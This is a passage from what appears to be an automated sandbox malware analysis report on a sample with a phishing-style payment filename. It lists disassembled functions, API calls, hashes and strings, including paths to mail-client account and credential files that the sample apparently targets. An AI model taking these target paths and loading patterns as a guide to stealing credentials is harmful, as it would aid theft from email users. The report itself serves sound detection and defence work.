                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7810546521.0000000034F56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_34f40000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                          • String ID: CorExitProcess$mscoree.dll$h#9/
                                                                                                                                                                                                                                          • API String ID: 4061214504-3673377281
                                                                                                                                                                                                                                          • Opcode ID: baf827640e20a56b0ce9aa091247dfe2fd6ac44bde3c4ba6f1aa7b26d3282a09
                                                                                                                                                                                                                                          • Instruction ID: 2163c97ad56153c2483bf123f8c7c7068f3beec2f11332b08f2a93f4802b61ee
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: baf827640e20a56b0ce9aa091247dfe2fd6ac44bde3c4ba6f1aa7b26d3282a09
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2EF03C75A00208ABDB119B94EC08B9DBFB9EF54251F4945A8E805B6350DF309943CA95
                                                                                                                                                                                                                                          Function 004065C9 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 373 4065c9-4065e9 GetSystemDirectoryW 374 4065eb 373->374 375 4065ed-4065ef 373->375 374->375 376 406600-406602 375->376 377 4065f1-4065fa 375->377 379 406603-406636 wsprintfW LoadLibraryExW 376->379 377->376 378 4065fc-4065fe 377->378 378->379
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004065E0
                                                                                                                                                                                                                                          • wsprintfW.USER32 ref: 0040661B
                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(?,00000000,?), ref: 0040662F
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.7792667737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7792636395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7792707770.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7792742913.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7792818028.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                                                                                                                          • String ID: %s%S.dll$UXTHEME$\
                                                                                                                                                                                                                                          • API String ID: 2200240437-1946221925
                                                                                                                                                                                                                                          • Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                                                                                                                                                                                          • Instruction ID: 20a568d0c0fc1602bd6380e0cb5a56c4d8b7367864d21650c92abf75bc562668
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E5F0F670500219AADB14AB64ED0DF9B366CAB00304F10447AA646F11D1EBB8DA24CBA8
                                                                                                                                                                                                                                          Function 34F41000 Relevance: 9.1, APIs: 6, Instructions: 76stringCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • lstrcatW.KERNEL32(?,?,?,?,?,00000000), ref: 34F41038
                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 34F4104B
                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 34F41061
                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 34F41075
                                                                                                                                                                                                                                          • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 34F41090
                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,00000000), ref: 34F410B8
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.7810546521.0000000034F41000.00000040.00001000.00020000.00000000.sdmp, Offset: 34F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7810515071.0000000034F40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7810546521.0000000034F56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_34f40000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: lstrlen$AttributesFilelstrcat
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3594823470-0
                                                                                                                                                                                                                                          • Opcode ID: fe2011acfaccb92d2297604feff3c4f4a77c706789818663bb7d2f8ab761e138
                                                                                                                                                                                                                                          • Instruction ID: 2cb55b4bf06892ea640ef3f5ec513b5bc057de8246b5887778c4736b694d3b4b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fe2011acfaccb92d2297604feff3c4f4a77c706789818663bb7d2f8ab761e138
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C321A379900328DBDF10EB65ED4CEDB3B28EF44354F144A56E959932A1DE309A87CB80
                                                                                                                                                                                                                                          Function 34F411EA Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 90COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 34F41E89: lstrlenW.KERNEL32(?,?,?,?,?,34F410DF,?,?,?,00000000), ref: 34F41E9A
                                                                                                                                                                                                                                            • Part of subcall function 34F41E89: lstrcatW.KERNEL32(?,?,?,34F410DF,?,?,?,00000000), ref: 34F41EAC
                                                                                                                                                                                                                                            • Part of subcall function 34F41E89: lstrlenW.KERNEL32(?,?,34F410DF,?,?,?,00000000), ref: 34F41EB3
                                                                                                                                                                                                                                            • Part of subcall function 34F41E89: lstrlenW.KERNEL32(?,?,34F410DF,?,?,?,00000000), ref: 34F41EC8
                                                                                                                                                                                                                                            • Part of subcall function 34F41E89: lstrcatW.KERNEL32(?,34F410DF,?,34F410DF,?,?,?,00000000), ref: 34F41ED3
                                                                                                                                                                                                                                          • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 34F4122A
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.7810546521.0000000034F41000.00000040.00001000.00020000.00000000.sdmp, Offset: 34F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7810515071.0000000034F40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7810546521.0000000034F56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_34f40000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: lstrlen$lstrcat$AttributesFile
                                                                                                                                                                                                                                          • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                                                                                                                                                                                                          • API String ID: 1475205934-1520055953
                                                                                                                                                                                                                                          • Opcode ID: a7afa51d116a54b43e46133b1e0c69fdaff0c3cddb31257e03a7be31008e9f49
                                                                                                                                                                                                                                          • Instruction ID: fee5b14bc9a9a69c84a57ac9f4b15d58411f34b598f00a6706d5a01927cef1ab
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a7afa51d116a54b43e46133b1e0c69fdaff0c3cddb31257e03a7be31008e9f49
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A521D779E10208BBE710A794ED81FED7339EF40714F040956F604EB2D0EAB16E828B58
                                                                                                                                                                                                                                          Function 004064F3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CharNextW.USER32(?,*?|<>/":,00000000,00000000,007B5800,007B5800,007B3000,0040332B,007B5800,76943420,0040359C,?,00000006,?,0000000A), ref: 00406556
                                                                                                                                                                                                                                          • CharNextW.USER32(?,?,?,00000000,?,00000006,?,0000000A), ref: 00406565
                                                                                                                                                                                                                                          • CharNextW.USER32(?,00000000,007B5800,007B5800,007B3000,0040332B,007B5800,76943420,0040359C,?,00000006,?,0000000A), ref: 0040656A
                                                                                                                                                                                                                                          • CharPrevW.USER32(?,?,007B5800,007B5800,007B3000,0040332B,007B5800,76943420,0040359C,?,00000006,?,0000000A), ref: 0040657D
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.7792667737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7792636395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7792707770.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7792742913.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7792818028.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Char$Next$Prev
                                                                                                                                                                                                                                          • String ID: *?|<>/":
                                                                                                                                                                                                                                          • API String ID: 589700163-165019052
                                                                                                                                                                                                                                          • Opcode ID: dac06de1e1615827748cce9690c43cbd9586789469f0d882438918906e4257c7
                                                                                                                                                                                                                                          • Instruction ID: b8c3cbf5b75eb2b2499c9cde9ef872d51aef5c2750dc7b0313243111e00abff4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dac06de1e1615827748cce9690c43cbd9586789469f0d882438918906e4257c7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9B11C85580021275DB303B14BC40ABBA6F8EF59754F52403FE985732C8E77C5C9286BD
                                                                                                                                                                                                                                          Function 34F41E89 Relevance: 7.5, APIs: 5, Instructions: 41stringCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,?,34F410DF,?,?,?,00000000), ref: 34F41E9A
                                                                                                                                                                                                                                          • lstrcatW.KERNEL32(?,?,?,34F410DF,?,?,?,00000000), ref: 34F41EAC
                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,34F410DF,?,?,?,00000000), ref: 34F41EB3
                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,34F410DF,?,?,?,00000000), ref: 34F41EC8
                                                                                                                                                                                                                                          • lstrcatW.KERNEL32(?,34F410DF,?,34F410DF,?,?,?,00000000), ref: 34F41ED3
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.7810546521.0000000034F41000.00000040.00001000.00020000.00000000.sdmp, Offset: 34F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7810515071.0000000034F40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7810546521.0000000034F56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_34f40000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: lstrlen$lstrcat
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 493641738-0
                                                                                                                                                                                                                                          • Opcode ID: 1777abf53dac451d633f440f5d0657c33847f2670e1c8849d676efe17f3f72b7
                                                                                                                                                                                                                                          • Instruction ID: 9868fdf94ec0a6b20ffac9bac7250b978936c0ac0b5b49969404f599cacb7721
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1777abf53dac451d633f440f5d0657c33847f2670e1c8849d676efe17f3f72b7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 67F0892A1001147AD721371AFC85E7F7B7CEFC5B64F49041DF608932949F55694392F9
                                                                                                                                                                                                                                          Function 34F48821 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 216COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,34F46FFD,00000000,?,?,?,34F48A72,?,?,00000100), ref: 34F4887B
                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,34F48A72,?,?,00000100,5EFC4D8B,?,?), ref: 34F48901
                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 34F489FB
                                                                                                                                                                                                                                            • Part of subcall function 34F456D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 34F45702
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.7810546521.0000000034F41000.00000040.00001000.00020000.00000000.sdmp, Offset: 34F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7810515071.0000000034F40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7810546521.0000000034F56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_34f40000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ByteCharMultiWide$AllocateHeap
                                                                                                                                                                                                                                          • String ID: h#9/
                                                                                                                                                                                                                                          • API String ID: 2584219951-176419635
                                                                                                                                                                                                                                          • Opcode ID: f0dc5f62bb6d51318aedf3290877daa567ada12ae3b185074cfeae33f0f36e01
                                                                                                                                                                                                                                          • Instruction ID: dbe9141b73a2cd9f8de4fa74c7cea57440c125eb5392305134f282edd68b38b9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f0dc5f62bb6d51318aedf3290877daa567ada12ae3b185074cfeae33f0f36e01
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FA51E87A610216AFEB158E64CC40EBB3FA9EF447A0F194A2CFD04D6380EF74DC528691
                                                                                                                                                                                                                                          Function 34F486E4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,34F46FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 34F48731
                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 34F487BA
                                                                                                                                                                                                                                          • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 34F487CC
                                                                                                                                                                                                                                            • Part of subcall function 34F456D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 34F45702
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.7810546521.0000000034F41000.00000040.00001000.00020000.00000000.sdmp, Offset: 34F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7810515071.0000000034F40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7810546521.0000000034F56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_34f40000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ByteCharMultiWide$AllocateHeapStringType
                                                                                                                                                                                                                                          • String ID: h#9/
                                                                                                                                                                                                                                          • API String ID: 1699317483-176419635
                                                                                                                                                                                                                                          • Opcode ID: 4b6205bd16d94903d5f6ffca1db1e4b0f0beba14c64be3a30ffa87449a7dbbc7
                                                                                                                                                                                                                                          • Instruction ID: ff191773c96fa04036f62fd4b04afd0e36a66d9e3f1fee8ec15e89ec50e40dd6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4b6205bd16d94903d5f6ffca1db1e4b0f0beba14c64be3a30ffa87449a7dbbc7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7A319D7AA0021AAFEB158F65DC90DAF7FA5EB44350F090628EC059B290EF35D952CB90
                                                                                                                                                                                                                                          Function 34F498F5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101fileCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000D55,00000000,00000000,?,00000000,?,?,34F49C54,?,00000000,?), ref: 34F499A8
                                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,34F49C54,?,00000000,?,00000000,00000000,?,00000000), ref: 34F499D6
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,34F49C54,?,00000000,?,00000000,00000000,?,00000000), ref: 34F49A07
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.7810546521.0000000034F41000.00000040.00001000.00020000.00000000.sdmp, Offset: 34F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7810515071.0000000034F40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7810546521.0000000034F56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_34f40000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ByteCharErrorFileLastMultiWideWrite
                                                                                                                                                                                                                                          • String ID: h#9/
                                                                                                                                                                                                                                          • API String ID: 2456169464-176419635
                                                                                                                                                                                                                                          • Opcode ID: 98a1f2cd290fcc0671df3481e48f62a3fe2683374711adf3279f941533988dca
                                                                                                                                                                                                                                          • Instruction ID: fa1e5e988d1f33e99a354e9898b18d79c0f1fe7d8c994e45b1a9a53c18973753
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 98a1f2cd290fcc0671df3481e48f62a3fe2683374711adf3279f941533988dca
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9D3145757002199FDB14CF69DC919EAB7B9EF48344F0548ADE509D7390DA30AD82CF61
                                                                                                                                                                                                                                          Function 34F415DA Relevance: 6.1, APIs: 4, Instructions: 84stringCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,34F4190E,?,?,00000000,?,00000000), ref: 34F41643
                                                                                                                                                                                                                                          • lstrcatW.KERNEL32(?,?,?,?,?,?,34F4190E,?,?,00000000,?,00000000,?,?,?,?), ref: 34F4165A
                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,?,34F4190E,?,?,00000000,?,00000000,?,?,?,?,?), ref: 34F41661
                                                                                                                                                                                                                                          • lstrcatW.KERNEL32(00001008,?,?,?,?,?,34F4190E,?,?,00000000,?,00000000,?,?,?,?), ref: 34F41686
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.7810546521.0000000034F41000.00000040.00001000.00020000.00000000.sdmp, Offset: 34F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7810515071.0000000034F40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7810546521.0000000034F56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_34f40000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: lstrcatlstrlen
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1475610065-0
                                                                                                                                                                                                                                          • Opcode ID: df1b96f3212ce6853129ab22017153c792a4578ef14a36619dd6b985c7652738
                                                                                                                                                                                                                                          • Instruction ID: bd161e38f8d72723c4decafb29c186415a724f98eb90ee17107f22fe705049f3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: df1b96f3212ce6853129ab22017153c792a4578ef14a36619dd6b985c7652738
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5821DA36900204EFDB05DB55EC85EEE7BB8EF88714F18445AEA04BB345DF34A94387A9
                                                                                                                                                                                                                                          Function 34F47153 Relevance: 6.1, APIs: 4, Instructions: 68COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetEnvironmentStringsW.KERNEL32 ref: 34F4715C
                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 34F4717F
                                                                                                                                                                                                                                            • Part of subcall function 34F456D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 34F45702
                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 34F471A5
                                                                                                                                                                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 34F471C7
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.7810546521.0000000034F41000.00000040.00001000.00020000.00000000.sdmp, Offset: 34F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7810515071.0000000034F40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7810546521.0000000034F56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_34f40000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1794362364-0
                                                                                                                                                                                                                                          • Opcode ID: 2aa78ca7138873515a4f22e4ea7041ad738749b4ed286c490c2387b1876427a7
                                                                                                                                                                                                                                          • Instruction ID: c567c5f3a45dfc0ff7c3f0a8f0c6ead7983a0010209e9ef44a5c428b7da0e79a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2aa78ca7138873515a4f22e4ea7041ad738749b4ed286c490c2387b1876427a7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5C0184B6605215BF27111ABAAC88D7B7EADDEC6AA0369092DBD04D7304EE608C0381F4
                                                                                                                                                                                                                                          Function 34F45CE1 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,34F41D66,00000000,00000000,?,34F45C88,34F41D66,00000000,00000000,00000000,?,34F45E85,00000006,FlsSetValue), ref: 34F45D13
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,34F45C88,34F41D66,00000000,00000000,00000000,?,34F45E85,00000006,FlsSetValue,34F4E190,FlsSetValue,00000000,00000364,?,34F45BC8), ref: 34F45D1F
                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,34F45C88,34F41D66,00000000,00000000,00000000,?,34F45E85,00000006,FlsSetValue,34F4E190,FlsSetValue,00000000), ref: 34F45D2D
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.7810546521.0000000034F41000.00000040.00001000.00020000.00000000.sdmp, Offset: 34F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7810515071.0000000034F40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7810546521.0000000034F56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_34f40000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3177248105-0
                                                                                                                                                                                                                                          • Opcode ID: 739d14645c032398ed896632b6bab650ad5c88a07adc4bbaee73b5c1c8bd9e18
                                                                                                                                                                                                                                          • Instruction ID: c45023ca2b65f605f0dfb1533d17e41257e9142d45901090db7563922f5a400f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 739d14645c032398ed896632b6bab650ad5c88a07adc4bbaee73b5c1c8bd9e18
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4601D8377093266BD3516A68EC48A567B6CEF157E1B190A24FB05E7344DF20D403CAD4
                                                                                                                                                                                                                                          Function 34F49B0D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 186COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.7810546521.0000000034F41000.00000040.00001000.00020000.00000000.sdmp, Offset: 34F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7810515071.0000000034F40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7810546521.0000000034F56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_34f40000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: h#9/
                                                                                                                                                                                                                                          • API String ID: 0-176419635
                                                                                                                                                                                                                                          • Opcode ID: c35fe5f0a230758ac5f0280fee7a5b12682d4fc7d1d71953c77426f859448e54
                                                                                                                                                                                                                                          • Instruction ID: e354a938ed4a346a7107a9aba584cef1ff2ea04f78500e7339e940d821bdb89a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c35fe5f0a230758ac5f0280fee7a5b12682d4fc7d1d71953c77426f859448e54
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 98513DB5B0820AAEFB118FB8C844EAE7FB8AF45314F480959E504A7390DE759943CF61
                                                                                                                                                                                                                                          Function 34F46E20 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 168COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 34F469F3: GetOEMCP.KERNEL32(00000000,?,?,34F46C7C,?), ref: 34F46A1E
                                                                                                                                                                                                                                          • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,34F46CC1,?,00000000), ref: 34F46E94
                                                                                                                                                                                                                                          • GetCPInfo.KERNEL32(00000000,34F46CC1,?,?,?,34F46CC1,?,00000000), ref: 34F46EA7
                                                                                                                                                                                                                                          Strings
